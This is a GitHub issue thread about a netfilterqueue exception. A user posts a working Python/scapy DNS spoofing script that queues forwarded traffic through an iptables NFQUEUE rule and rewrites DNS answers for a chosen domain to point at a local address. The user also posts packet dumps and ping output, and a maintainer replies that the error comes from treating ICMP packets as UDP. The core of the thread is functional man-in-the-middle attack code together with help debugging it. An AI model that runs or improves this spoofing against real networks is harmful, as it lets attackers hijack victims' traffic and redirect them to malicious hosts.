IndexError('Layer [UDP] not found',) in 'netfilterqueue.global_callback' ignored
pkahsan opened this issue · 2 comments
The iptables i use are:
iptables -I FORWARD -j NFQUEUE --queue-num 0
import netfilterqueue
import scapy.all as scapy
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
if "www.oldverision.com" in qname:
print("[+] Spoofing target ")
answer = scapy.DNSRR(rrname=qname, rdata="192.168.0.104")
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
print("packet's summary: " + str(scapy_packet.summary()))
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.UDP].chksum
print("packet's summary after modify: " + str(scapy_packet.summary()))
print(scapy_packet.show())
print(packet.show())
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
Following is the output:
[+] Spoofing target
packet's summary: IP / ICMP / IPerror / UDPerror / DNS Ans "192.168.0.104"
Exception IndexError: IndexError('Layer [UDP] not found',) in 'netfilterqueue.global_callback' ignored
[+] Spoofing target
packet's summary: IP / UDP / DNS Ans "192.168.0.104"
packet's summary after modify: IP / UDP / DNS Ans "192.168.0.104"
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = None
id = 9623
flags =
frag = 0
ttl = 63
proto = udp
chksum = None
src = 192.168.0.1
dst = 192.168.0.102
\options \
###[ UDP ]###
sport = domain
dport = 61702
len = None
chksum = None
###[ DNS ]###
id = 28104
qr = 1
opcode = QUERY
aa = 1
tc = 0
rd = 1
ra = 1
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 1
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'www.oldverision.com.'
| qtype = A
| qclass = IN
\an \
|###[ DNS Resource Record ]###
| rrname = 'www.oldverision.com.'
| type = A
| rclass = IN
| ttl = 0
| rdlen = 4
| rdata = '192.168.0.104'
ns = None
ar = None
following is the ping result:
Pinging www.oldverision.com [107.183.175.41] with 32 bytes of data:
Reply from 107.183.175.41: bytes=32 time=388ms TTL=227
Reply from 107.183.175.41: bytes=32 time=400ms TTL=227
Reply from 107.183.175.41: bytes=32 time=424ms TTL=227
When it says something about an exception being ignored, this usually indicates a problem in the user code, not library code. It's a Cython thing.
If I had to guess, the exception comes from your del scapy_packet[scapy.UDP].len
line when the input is a ICMP packet, based on the output you provided where it works on UDP and fails on ICMP, and the code you provided where it seems to be assuming all input is UDP.
Even if i don't delete length of UDP, same error comes. but when i mention -p udp
in iptables
, then this exception error doesn't come. but big problem is that when i ping server from remote machine, the target still not spoofed, but packet is modified having rdata=redirect_ip